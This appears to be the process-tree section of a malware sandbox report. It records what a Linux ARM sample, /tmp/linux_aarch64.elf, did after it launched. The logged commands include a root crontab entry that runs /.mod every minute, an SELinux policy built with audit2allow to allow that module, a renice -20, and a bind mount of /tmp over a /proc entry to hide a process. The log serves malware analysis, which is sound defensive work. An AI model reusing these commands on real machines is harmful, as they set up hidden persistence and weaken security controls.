                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:53
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:53
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/journalctl
                                                                                                  Arguments:journalctl -xe --no-pager
                                                                                                  File size:80120 bytes
                                                                                                  MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:/bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:54
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/bash
                                                                                                  Arguments:/bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/renice
                                                                                                  Arguments:renice -20 6279
                                                                                                  File size:14568 bytes
                                                                                                  MD5 hash:3686c936ed1df483498266a36871cb5b

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/mount
                                                                                                  Arguments:mount -o bind /tmp/ /proc/6279
                                                                                                  File size:55528 bytes
                                                                                                  MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:service cron start
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl --quiet is-active multi-user.target
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:57
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:57
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:57
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl list-unit-files --full --type=socket
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:57
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):22:59:57
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/sed
                                                                                                  Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                  File size:121288 bytes
                                                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                  Start time (UTC):22:59:58
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl start cron.service
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:58
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/tmp/linux_aarch64.elf
                                                                                                  Arguments:-
                                                                                                  File size:5706200 bytes
                                                                                                  MD5 hash:02e8e39e1b46472a60d128a6da84a2b8

                                                                                                  Start time (UTC):22:59:58
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl start crond.service
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                  File size:22760 bytes
                                                                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):22:59:52
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                  File size:22760 bytes
                                                                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                  Start time (UTC):22:59:53
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/udisks2/udisksd
                                                                                                  Arguments:-
                                                                                                  File size:483056 bytes
                                                                                                  MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                  Start time (UTC):22:59:56
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/dumpe2fs
                                                                                                  Arguments:dumpe2fs -h /dev/dm-0
                                                                                                  File size:31112 bytes
                                                                                                  MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                  Start time (UTC):22:59:58
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):22:59:58
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:/usr/sbin/cron -f
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:-
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:-
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -c "/.mod "
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/.mod
                                                                                                  Arguments:/.mod
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/.mod
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):23:00:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:/usr/sbin/cron -f
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                                                  Start time (UTC):23:01:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:-
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                                                  Start time (UTC):23:01:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:-
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                                                  Start time (UTC):23:01:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -c "/.mod "
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):23:01:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):23:01:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/.mod
                                                                                                  Arguments:/.mod
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:01:01
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/.mod
                                                                                                  Arguments:-
                                                                                                  File size:1183448 bytes
                                                                                                  MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                  Start time (UTC):23:01:02
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):23:01:02
                                                                                                  Start date (UTC):25/11/2024
                                                                                                  Path:/usr/sbin/cron
                                                                                                  Arguments:/usr/sbin/cron -f
                                                                                                  File size:55944 bytes
                                                                                                  MD5 hash:2c82564ff5cc862c89392b061c7fbd59